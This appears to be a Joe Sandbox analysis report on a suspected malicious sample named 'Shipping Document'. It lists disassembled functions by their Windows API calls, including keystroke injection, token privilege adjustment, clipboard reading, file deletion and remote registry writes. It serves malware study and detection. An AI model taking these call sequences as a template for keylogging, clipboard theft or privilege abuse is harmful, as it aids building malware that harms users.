FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00FFDA8E
IsIconic.USER32(?), ref: 00FFDA97
ShowWindow.USER32(?,00000009), ref: 00FFDAA4
SetForegroundWindow.USER32(?), ref: 00FFDAAE
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00FFDAC4
GetCurrentThreadId.KERNEL32 ref: 00FFDACB
GetWindowThreadProcessId.USER32(?,00000000), ref: 00FFDAD7
AttachThreadInput.USER32(?,00000000,00000001), ref: 00FFDAE8
AttachThreadInput.USER32(?,00000000,00000001), ref: 00FFDAF0
AttachThreadInput.USER32(00000000,?,00000001), ref: 00FFDAF8
SetForegroundWindow.USER32(?), ref: 00FFDAFB
MapVirtualKeyW.USER32(00000012,00000000), ref: 00FFDB10
keybd_event.USER32(00000012,00000000), ref: 00FFDB1B
MapVirtualKeyW.USER32(00000012,00000000), ref: 00FFDB25
keybd_event.USER32(00000012,00000000), ref: 00FFDB2A
MapVirtualKeyW.USER32(00000012,00000000), ref: 00FFDB33
keybd_event.USER32(00000012,00000000), ref: 00FFDB38
MapVirtualKeyW.USER32(00000012,00000000), ref: 00FFDB42
keybd_event.USER32(00000012,00000000), ref: 00FFDB47
SetForegroundWindow.USER32(?), ref: 00FFDB4A
AttachThreadInput.USER32(?,?,00000000), ref: 00FFDB71

Strings

Shell_TrayWnd, xrefs: 00FFDA89

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
String ID: Shell_TrayWnd
API String ID: 4125248594-2988720461
Opcode ID: 2083cab603aae1556ece71562a545e63597b45ebb9a712245bafcf7b99d075a3
Instruction ID: 14f72b0facbe07754ba3db60e6e61433e768529b22ed09ef54b63158d704d455
Opcode Fuzzy Hash: 2083cab603aae1556ece71562a545e63597b45ebb9a712245bafcf7b99d075a3
Instruction Fuzzy Hash: D7319FB5A8031CBBEB306FA59D89F7F3E6CEF44B60F104015FB00EA190C6B55900ABA4

Function 01018858 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 224COMMON

Download Yara Rule

APIs

Part of subcall function 01018CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 01018D0D
Part of subcall function 01018CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 01018D3A
Part of subcall function 01018CC3: GetLastError.KERNEL32 ref: 01018D47

_memset.LIBCMT ref: 0101889B
DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 010188ED
CloseHandle.KERNEL32(?), ref: 010188FE
OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 01018915
GetProcessWindowStation.USER32 ref: 0101892E
SetProcessWindowStation.USER32(00000000), ref: 01018938
OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 01018952

Part of subcall function 01018713: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,01018851), ref: 01018728
Part of subcall function 01018713: CloseHandle.KERNEL32(?,?,01018851), ref: 0101873A

Strings

winsta0, xrefs: 01018910
, xrefs: 010188AA
default, xrefs: 0101894D

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
String ID: $default$winsta0
API String ID: 2063423040-1027155976
Opcode ID: 2f03aa79325b7af01cb9e1391307396d2fbfbe60832a8de22f521c339da7bf99
Instruction ID: f2d3a18f4916b2dc3e1a93db0dfca67da4432a8bfc9c5aac7206bb24898925b7
Opcode Fuzzy Hash: 2f03aa79325b7af01cb9e1391307396d2fbfbe60832a8de22f521c339da7bf99
Instruction Fuzzy Hash: 36814FB6D0024ABFEF11DFA8DD44AEE7BB8FF05305F08815AF990A6154D7398A14DB60

Function 0103425A Relevance: 30.2, APIs: 20, Instructions: 167clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(0104F910), ref: 01034284
IsClipboardFormatAvailable.USER32(0000000D), ref: 01034292
GetClipboardData.USER32(0000000D), ref: 0103429A
CloseClipboard.USER32 ref: 010342A6
GlobalLock.KERNEL32(00000000), ref: 010342C2
CloseClipboard.USER32 ref: 010342CC
GlobalUnlock.KERNEL32(00000000,00000000), ref: 010342E1
IsClipboardFormatAvailable.USER32(00000001), ref: 010342EE
GetClipboardData.USER32(00000001), ref: 010342F6
GlobalLock.KERNEL32(00000000), ref: 01034303
GlobalUnlock.KERNEL32(00000000,00000000,?), ref: 01034337
CloseClipboard.USER32 ref: 01034447

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
String ID:
API String ID: 3222323430-0
Opcode ID: e28a9b5ff094c309f25d7cae2b2ac6b647dcdfb2250f66e6a6a4a28474e3dc27
Instruction ID: 2d3aa62b0cd9c0d04471d6c602c5da866f350841dd73c84835b4a5c419731c37
Opcode Fuzzy Hash: e28a9b5ff094c309f25d7cae2b2ac6b647dcdfb2250f66e6a6a4a28474e3dc27
Instruction Fuzzy Hash: 58518FB9204303ABD311AF69EE86F6E77ACAF84B00F004529F5D6D6191DF79D9048B62

Function 0102C9C7 Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 280timefileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 0102C9F8
FindClose.KERNEL32(00000000), ref: 0102CA4C
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0102CA71
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0102CA88
FileTimeToSystemTime.KERNEL32(?,?), ref: 0102CAAF
__swprintf.LIBCMT ref: 0102CAFB
__swprintf.LIBCMT ref: 0102CB3E

Part of subcall function 00FC7F41: _memmove.LIBCMT ref: 00FC7F82

__swprintf.LIBCMT ref: 0102CB92

Part of subcall function 00FE38D8: __woutput_l.LIBCMT ref: 00FE3931

__swprintf.LIBCMT ref: 0102CBE0

Part of subcall function 00FE38D8: __flsbuf.LIBCMT ref: 00FE3953
Part of subcall function 00FE38D8: __flsbuf.LIBCMT ref: 00FE396B

__swprintf.LIBCMT ref: 0102CC2F
__swprintf.LIBCMT ref: 0102CC7E
__swprintf.LIBCMT ref: 0102CCCD

Strings

%02d, xrefs: 0102CB86, 0102CB90, 0102CBDE, 0102CC2D, 0102CC7C, 0102CCCB
%4d, xrefs: 0102CB38
%4d%02d%02d%02d%02d%02d, xrefs: 0102CAF5

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
API String ID: 3953360268-2428617273
Opcode ID: c1e10f2127ab2917a274ded19ce4acc0b80eec05fecd2deba20229771951605d
Instruction ID: 04800fd5ec1c840ba9d975b6d8d15e96aed7afb9b3e2009d7fd6e85c1f907847
Opcode Fuzzy Hash: c1e10f2127ab2917a274ded19ce4acc0b80eec05fecd2deba20229771951605d
Instruction Fuzzy Hash: 7CA15FB2408345ABD710EB65CE86EAFB7ECAF84700F40491DF585C3191EB78DA08DB62

Function 0102F200 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 119fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,771A8FB0,?,00000000), ref: 0102F221
_wcscmp.LIBCMT ref: 0102F236
_wcscmp.LIBCMT ref: 0102F24D
GetFileAttributesW.KERNEL32(?), ref: 0102F25F
SetFileAttributesW.KERNEL32(?,?), ref: 0102F279
FindNextFileW.KERNEL32(00000000,?), ref: 0102F291
FindClose.KERNEL32(00000000), ref: 0102F29C
FindFirstFileW.KERNEL32(*.*,?), ref: 0102F2B8
_wcscmp.LIBCMT ref: 0102F2DF
_wcscmp.LIBCMT ref: 0102F2F6
SetCurrentDirectoryW.KERNEL32(?), ref: 0102F308
SetCurrentDirectoryW.KERNEL32(0107A5A0), ref: 0102F326
FindNextFileW.KERNEL32(00000000,00000010), ref: 0102F330
FindClose.KERNEL32(00000000), ref: 0102F33D
FindClose.KERNEL32(00000000), ref: 0102F34F

Strings

*.*, xrefs: 0102F2B3

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
String ID: *.*
API String ID: 1803514871-438819550
Opcode ID: 60c071c229fd0a523425075cadbbba6cf034fa3a5a88ad1f9ad5fea67eea62dd
Instruction ID: 686070ed8eac03766aafa56be816abe9fc7ff8f429e043015ccfc10f2b6a7368
Opcode Fuzzy Hash: 60c071c229fd0a523425075cadbbba6cf034fa3a5a88ad1f9ad5fea67eea62dd
Instruction Fuzzy Hash: 5931F97660022B6FDB20DAB9DC9CEDE7BFC9F092A1F148195E980D3050EB35DA45CB64

Function 01040AE2 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 01040BDE
RegCreateKeyExW.ADVAPI32(?,?,00000000,0104F910,00000000,?,00000000,?,?), ref: 01040C4C
RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 01040C94
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 01040D1D
RegCloseKey.ADVAPI32(?), ref: 0104103D
RegCloseKey.ADVAPI32(00000000), ref: 0104104A

Strings

REG_MULTI_SZ, xrefs: 01040E05
REG_BINARY, xrefs: 01040FD8
REG_SZ, xrefs: 01040D5B
REG_QWORD, xrefs: 01040F8B
REG_DWORD, xrefs: 01040F0E
REG_EXPAND_SZ, xrefs: 01040CBA

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: Close$ConnectCreateRegistryValue
String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
API String ID: 536824911-966354055
Opcode ID: 333b8d59b60993ac98a7442f00ab62e0a734f0b0de0cb5ff55baacc40407a6e2
Instruction ID: 5644c0fb82c1db8ac7f48d6071cf2f06e349d3268ace53f17e3408ee76d3b2dc
Opcode Fuzzy Hash: 333b8d59b60993ac98a7442f00ab62e0a734f0b0de0cb5ff55baacc40407a6e2
Instruction Fuzzy Hash: EB028D752046029FCB14EF29C985E2AB7E5FF88710F05846DF98A9B761CB79EC40DB81

Function 0102F35D Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 112fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,771A8FB0,?,00000000), ref: 0102F37E
_wcscmp.LIBCMT ref: 0102F393
_wcscmp.LIBCMT ref: 0102F3AA

Part of subcall function 010245C1: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 010245DC

FindNextFileW.KERNEL32(00000000,?), ref: 0102F3D9
FindClose.KERNEL32(00000000), ref: 0102F3E4
FindFirstFileW.KERNEL32(*.*,?), ref: 0102F400
_wcscmp.LIBCMT ref: 0102F427
_wcscmp.LIBCMT ref: 0102F43E
SetCurrentDirectoryW.KERNEL32(?), ref: 0102F450
SetCurrentDirectoryW.KERNEL32(0107A5A0), ref: 0102F46E
FindNextFileW.KERNEL32(00000000,00000010), ref: 0102F478
FindClose.KERNEL32(00000000), ref: 0102F485
FindClose.KERNEL32(00000000), ref: 0102F497

Strings

*.*, xrefs: 0102F3FB

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
String ID: *.*
API String ID: 1824444939-438819550
Opcode ID: e903157c0471cabe1a25a234ac2d283f1b97de4a99cf8da0490ca80ea98ae7bd
Instruction ID: 3939c2a3638435939f8bf36f501735eaf98bf1be64ee9c045d5c057bac3ef404
Opcode Fuzzy Hash: e903157c0471cabe1a25a234ac2d283f1b97de4a99cf8da0490ca80ea98ae7bd
Instruction Fuzzy Hash: C631FA7550122B6FDB20AA79DC88ADE7BFC9F092A1F144195E9C0D3090DB75DA44CB64

Function 010181F7 Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0101874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 01018766
Part of subcall function 0101874A: GetLastError.KERNEL32(?,0101822A,?,?,?), ref: 01018770
Part of subcall function 0101874A: GetProcessHeap.KERNEL32(00000008,?,?,0101822A,?,?,?), ref: 0101877F
Part of subcall function 0101874A: HeapAlloc.KERNEL32(00000000,?,0101822A,?,?,?), ref: 01018786
Part of subcall function 0101874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0101879D

Part of subcall function 010187E7: GetProcessHeap.KERNEL32(00000008,01018240,00000000,00000000,?,01018240,?), ref: 010187F3
Part of subcall function 010187E7: HeapAlloc.KERNEL32(00000000,?,01018240,?), ref: 010187FA
Part of subcall function 010187E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,01018240,?), ref: 0101880B

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0101825B
_memset.LIBCMT ref: 01018270
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0101828F
GetLengthSid.ADVAPI32(?), ref: 010182A0
GetAce.ADVAPI32(?,00000000,?), ref: 010182DD
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 010182F9
GetLengthSid.ADVAPI32(?), ref: 01018316
GetProcessHeap.KERNEL32(00000008,-00000008), ref: 01018325
HeapAlloc.KERNEL32(00000000), ref: 0101832C
GetLengthSid.ADVAPI32(?,00000008,?), ref: 0101834D
CopySid.ADVAPI32(00000000), ref: 01018354
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 01018385
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 010183AB
SetUserObjectSecurity.USER32(?,00000004,?), ref: 010183BF

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
String ID:
API String ID: 3996160137-0
Opcode ID: 7d7c97a0aaa8a2bdcd1d8b958af619b8327b0464e6248441c246e5fdda5ad538
Instruction ID: cbc3c99b3c2c163c81f0aa440f22402fb584fbc30612cffd72df5bc753cf1182
Opcode Fuzzy Hash: 7d7c97a0aaa8a2bdcd1d8b958af619b8327b0464e6248441c246e5fdda5ad538
Instruction Fuzzy Hash: 0F617C7590020AAFDF14DFA8DD84AEEBBB9FF04200F04C15AF955A7294DB399A01DB60

Function 00FD6843 Relevance: 18.4, Strings: 14, Instructions: 883COMMON

Download Yara Rule

Strings

NO_AUTO_POSSESS), xrefs: 01011567
CRLF), xrefs: 010116FA
UTF), xrefs: 01011533
LIMIT_MATCH=, xrefs: 010115A9
ANY), xrefs: 01011717
UCP), xrefs: 01011546
LIMIT_RECURSION=, xrefs: 01011635
ANYCRLF), xrefs: 01011734
BSR_UNICODE), xrefs: 01011771
UTF16), xrefs: 01011508
NO_START_OPT), xrefs: 01011588
LF), xrefs: 010116DD
BSR_ANYCRLF), xrefs: 01011757
CR), xrefs: 010116C0

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID:
String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)
API String ID: 0-4052911093
Opcode ID: d73192275475527b772414cfc022a9a27a5cebfc8bd198e66f15e2178d571af4
Instruction ID: e5c79fd77671ef6b50e43699bc5fdbddfce0d7b9d3d395c88f89725d30e1da84
Opcode Fuzzy Hash: d73192275475527b772414cfc022a9a27a5cebfc8bd198e66f15e2178d571af4
Instruction Fuzzy Hash: 81727271E00219DBDB18CF68D8807ADB7F6FF48310F1881AAE999EB394D7749941DB90

Function 01040665 Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON

Download Yara Rule

APIs

Part of subcall function 010410A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,01040038,?,?), ref: 010410BC

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 01040737

Part of subcall function 00FC9997: __itow.LIBCMT ref: 00FC99C2
Part of subcall function 00FC9997: __swprintf.LIBCMT ref: 00FC9A0C

RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 010407D6
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 0104086E
RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 01040AAD
RegCloseKey.ADVAPI32(00000000), ref: 01040ABA

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
String ID:
API String ID: 1240663315-0
Opcode ID: d724de7aa8508871a2ff81a3c1cb7e457701f4b7002356bdf29c6a98580430b6
Instruction ID: f70d9755ba02cd4900e7ca3394f76d2c4441ee153bae463e918ddd4d3ef57441
Opcode Fuzzy Hash: d724de7aa8508871a2ff81a3c1cb7e457701f4b7002356bdf29c6a98580430b6
Instruction Fuzzy Hash: 9FE17D71204201AFCB14DF29C985E6ABBE8FF88714F04896DF58ADB265DB35ED01CB52

Function 01020219 Relevance: 16.6, APIs: 11, Instructions: 120keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 01020241
GetAsyncKeyState.USER32(000000A0), ref: 010202C2
GetKeyState.USER32(000000A0), ref: 010202DD
GetAsyncKeyState.USER32(000000A1), ref: 010202F7
GetKeyState.USER32(000000A1), ref: 0102030C
GetAsyncKeyState.USER32(00000011), ref: 01020324
GetKeyState.USER32(00000011), ref: 01020336
GetAsyncKeyState.USER32(00000012), ref: 0102034E
GetKeyState.USER32(00000012), ref: 01020360
GetAsyncKeyState.USER32(0000005B), ref: 01020378
GetKeyState.USER32(0000005B), ref: 0102038A

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: 4e4376f95228cecdb01f4a859161e98994454f8e2af295aceb2d645ca9fe7fc6
Instruction ID: 16d72109504159aa8d68255a0692aa95314a5acb8e9e5675f0c02747c5431e97
Opcode Fuzzy Hash: 4e4376f95228cecdb01f4a859161e98994454f8e2af295aceb2d645ca9fe7fc6
Instruction Fuzzy Hash: 9241D9746047DA6FFFB28A6C84043A6BEE46F02340F08C0DEE6C6461C7E7A555C887A2

Function 01034458 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 0103447F
EmptyClipboard.USER32 ref: 01034485
GlobalAlloc.KERNEL32(00000002,?), ref: 0103449A
CloseClipboard.USER32 ref: 01034539

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
Opcode ID: 4edd8424470326145187b7c63c67b6918bbfcc0992eb6f8fa72c19e5646d80ce
Instruction ID: ff00440354aff274a7889ec3aa26606ad20f242f3b4e5cee167302bf36aa03d2
Opcode Fuzzy Hash: 4edd8424470326145187b7c63c67b6918bbfcc0992eb6f8fa72c19e5646d80ce
Instruction Fuzzy Hash: A221C9793006129FDB219F69ED49F6E77A8EF44711F00805AF9C6CB2A5CB7AAD00CB54

Function 01023A2B Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00FC48AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00FC48A1,?,?,00FC37C0,?), ref: 00FC48CE

Part of subcall function 01024CD3: GetFileAttributesW.KERNEL32(?,01023947), ref: 01024CD4

FindFirstFileW.KERNEL32(?,?), ref: 01023ADF
DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 01023B87
MoveFileW.KERNEL32(?,?), ref: 01023B9A
DeleteFileW.KERNEL32(?,?,?,?,?), ref: 01023BB7
FindNextFileW.KERNEL32(00000000,00000010), ref: 01023BD9
FindClose.KERNEL32(00000000,?,?,?,?), ref: 01023BF5

Strings

\*.*, xrefs: 01023A8A, 01023A93, 01023AA8

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
String ID: \*.*
API String ID: 4002782344-1173974218
Opcode ID: e809285fdd4d1f4d859d581d2092fc540d561f50c790a3872bbc04e4bee407c0
Instruction ID: 8d728da8082c0e0aacb50baf8b73efd5e22c0386ce3ecf41c9f253a5613f705c
